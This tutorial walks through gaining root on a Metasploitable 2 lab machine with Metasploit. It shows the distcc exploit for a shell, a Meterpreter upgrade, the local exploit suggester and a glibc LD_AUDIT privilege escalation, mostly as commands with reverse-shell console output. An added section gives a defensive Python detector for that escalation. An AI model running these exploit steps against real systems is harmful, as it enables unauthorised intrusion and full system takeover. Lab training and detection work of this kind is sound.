How to Get Root with Metasploit's Local Exploit Suggester

Nov 26, 2019 11:00 PM
Nov 27, 2019 05:12 PM

So you've managed to get a shell on the target, but you only have measly low-level privileges. Now what? Privilege escalation is a vast field and can be one of the most rewarding yet frustrating phases of an attack. We could go the manual route, but like always, Metasploit makes it easy to perform local privilege escalation and get root with its exploit suggester module.

To run through the process, we're using Kali Linux as the attacking machine and Metasploitable 2 as the target. You can set up or use a similar pentesting lab — or the same one — to follow along with the guide below.

Step 1: Get Session on Target

The first thing we need to do is get a session with low privileges on the target. We can easily do this with Metasploit. Type msfconsole in the terminal to launch it.

~$ msfconsole

[-] ***rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***

                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .

       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 >

Metasploitable contains a vulnerable service called distccd, which is used to distribute program compilation across multiple systems, speeding things up by taking advantage of combined processor power. Unfortunately, this version of the program allows a remote attacker to execute arbitrary commands on the server.

We can search for the exploit using the search command:

msf5 > search distcc

Matching Modules
================

   #  Name                           Disclosure Date  Rank       Check  Description
   -  ----                           ---------------  ----       -----  -----------
   0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution

To load the module, type use followed by the full path of the module:

msf5 > use exploit/unix/misc/distcc_exec

We can now see the available settings with the options command:

msf5 exploit(unix/misc/distcc_exec) > options

Module options (exploit/unix/misc/distcc_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   3632             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

It looks like we only need to set the remote host address since the remote port is already set using the default port number. Use the set command to specify the appropriate IP address of the target:

msf5 exploit(unix/misc/distcc_exec) > set rhosts 10.10.0.50

rhosts => 10.10.0.50

Now we are ready to launch the exploit. Use the run command, which is just a shorter alias for exploit:

msf5 exploit(unix/misc/distcc_exec) > run

[*] Started reverse TCP double handler on 10.10.0.1:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo sWI9yfQYbPxuIGrh;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sWI9yfQYbPxuIGrh\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.0.1:4444 -> 10.10.0.50:58006) at 2019-11-19 11:46:02 -0500

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

We can see that a command shell was opened, and running uname -a verifies we have compromised the target.

Step 2: Upgrade to Meterpreter

To use Metasploit's local exploit suggester, we need to upgrade our basic Unix command shell to a Meterpreter session. While still in the basic command shell, press Ctrl-Z to background the session. Hit Y if it asks you to background it.

Background session 1? [y/N]  y
msf5 exploit(unix/misc/distcc_exec) >

We are now dropped back to the main Metasploit prompt, and we can verify any sessions we have running in the background with the sessions command:

msf5 exploit(unix/misc/distcc_exec) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)

The easiest way to upgrade a regular shell to a Meterpreter session is to use the -u flag followed by the session number to upgrade:

msf5 exploit(unix/misc/distcc_exec) > sessions -u 1

[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.0.1:4433
[*] Sending stage (985320 bytes) to 10.10.0.50
[*] Meterpreter session 2 opened (10.10.0.1:4433 -> 10.10.0.50:32979) at 2019-06-19 11:47:52 -0500
[*] Command stager progress: 100.00% (773/773 bytes)

We can see the post module run and a new session open. We can again verify this with the sessions command:

msf5 exploit(unix/misc/distcc_exec) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                Connection
  --  ----  ----                   -----------                                                ----------
  1         shell cmd/unix                                                                    10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
  2         meterpreter x86/linux  uid=1, gid=1, euid=1, egid=1 @ metasploitable.localdomain  10.10.0.1:4433 -> 10.10.0.50:32979 (10.10.0.50)

And we can interact with our new Meterpreter session using the -i flag on the desired session:

msf5 exploit(unix/misc/distcc_exec) > sessions -i 2

[*] Starting interaction with 2...

meterpreter >

Step 3: Run Exploit Suggester

Metasploit post modules work by running on a background session, not directly in the session itself, so background session 2 (our Meterpreter shell) and return to the main prompt. We can then load the local exploit suggester using the following command:

msf5 exploit(unix/misc/distcc_exec) > use post/multi/recon/local_exploit_suggester

When we take a look at the options, we only need to specify the session we want to run this on:

msf5 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

Simply set the session to number 2, which is our Meterpreter shell:

msf5 post(multi/recon/local_exploit_suggester) > set session 2

session => 2

And type run to kick it off:

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.0.50 - Collecting local exploits for x86/linux...
[*] 10.10.0.50 - 26 exploit checks are being tried...
[+] 10.10.0.50 - exploit/linux/local/glibc_ld_audit_dso_load_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit/linux/local/glibc_origin_expansion_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[*] Post module execution completed

We can see the module checks a number of local exploits and returns a few that seem viable. Awesome.

Step 4: Get Root

The final thing we need to do is use one of these exploits to get root on the system. We'll try the first one that was suggested to us. This exploit takes advantage of a vulnerability in the glibc dynamic linker, in which the LD_AUDIT environment variable allows loading of a setuid object that ultimately runs with root privileges.

msf5 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc

Looking at the options, we only need to set the session again — the default executable path will work for now:

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > options

Module options (exploit/linux/local/glibc_ld_audit_dso_load_priv_esc):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on.
   SUID_EXECUTABLE  /bin/ping        yes       Path to a SUID executable

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Set the session just like before:

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set session 2

session => 2

We can also set the payload to give us another Meterpreter session when the exploit completes:

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp

payload => linux/x86/meterpreter/reverse_tcp

And set the appropriate listening host (the IP address of our local machine) and port:

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lhost 10.10.0.1

lhost => 10.10.0.1

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lport 4321

lport => 4321

Finally, type run to launch the exploit:

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run

[*] Started reverse TCP handler on 10.10.0.1:4321
[+] The target appears to be vulnerable
[*] Using target: Linux x86
[*] Writing '/tmp/.BlrZu4n' (1271 bytes) ...
[*] Writing '/tmp/.18qZUt' (281 bytes) ...
[*] Writing '/tmp/.DoiFwlxPt' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (985320 bytes) to 10.10.0.50
[*] Meterpreter session 3 opened (10.10.0.1:4321 -> 10.10.0.50:56950) at 2019-11-19 11:57:19 -0500

meterpreter >

We now have a new Meterpreter session on the target, and we can drop into a shell to verify we have obtained root access:

meterpreter > shell
Process 4886 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=1(daemon)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
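
Added example, not part of the original article or of Metasploit: a defender-side detector for the behavior seen in this step, a non-root user launching a SUID executable with LD_AUDIT set shortly after hidden files are written under /tmp. The JSON event schema, the 60-second correlation window and the sample events are assumptions constructed for illustration.

```python
import json
import posixpath

LOADER_VARS = {"LD_AUDIT"}   # loader variable named in the article
WINDOW = 60                  # seconds between file drop and exec (assumed value)

# Constructed events in a hypothetical JSON-lines schema (not from the page).
SAMPLE_EVENTS = """\
{"ts": 100, "type": "exec", "uid": 1000, "path": "/bin/ping", "suid": true, "env": {"PATH": "/bin"}}
{"ts": 200, "type": "write", "uid": 1, "path": "/tmp/.aB3xYz"}
{"ts": 201, "type": "write", "uid": 1, "path": "/tmp/.q9Lm"}
{"ts": 205, "type": "exec", "uid": 1, "path": "/bin/ping", "suid": true, "env": {"LD_AUDIT": "constructed-value"}}
{"ts": 900, "type": "exec", "uid": 1000, "path": "/usr/bin/make", "suid": false, "env": {"LD_AUDIT": "/opt/audit.so"}}
"""

def is_hidden_tmp(path):
    """True for dotfiles written directly under /tmp or /var/tmp."""
    directory, name = posixpath.split(path)
    return directory in ("/tmp", "/var/tmp") and name.startswith(".")

def detect(lines):
    """Alert on SUID execs by non-root users that carry a loader variable."""
    drops = {}    # uid -> [(ts, path)] of hidden temp-file writes seen so far
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev["type"] == "write" and is_hidden_tmp(ev["path"]):
            drops.setdefault(ev["uid"], []).append((ev["ts"], ev["path"]))
        elif ev["type"] == "exec" and ev.get("suid") and ev["uid"] != 0:
            hits = sorted(LOADER_VARS & set(ev.get("env", {})))
            if not hits:
                continue  # ordinary SUID use, e.g. a user running ping
            # Same-user hidden temp files written just before the exec raise severity.
            recent = [p for ts, p in drops.get(ev["uid"], [])
                      if 0 <= ev["ts"] - ts <= WINDOW]
            alerts.append({
                "ts": ev["ts"], "uid": ev["uid"], "exe": ev["path"],
                "vars": hits, "staged_files": recent,
                "severity": "critical" if recent else "high",
            })
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS.splitlines()):
        print(json.dumps(alert))
```

Only the fourth sample event alerts: the first is a normal SUID exec with no loader variable, and the last sets LD_AUDIT on a non-SUID binary.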

Wrapping Up

In this tutorial, we learned how to use Metasploit to get a shell on the target, upgrade that shell to a Meterpreter session, and use the local exploit suggester module to ultimately get root on the system. Metasploit not only makes initial exploitation easy but the post-exploitation phase as well. In the next article, we will explore some useful post modules to quickly gather information about the target.

Cover image by Pixabay/Pexels; Screenshots by drd_/Null Byte
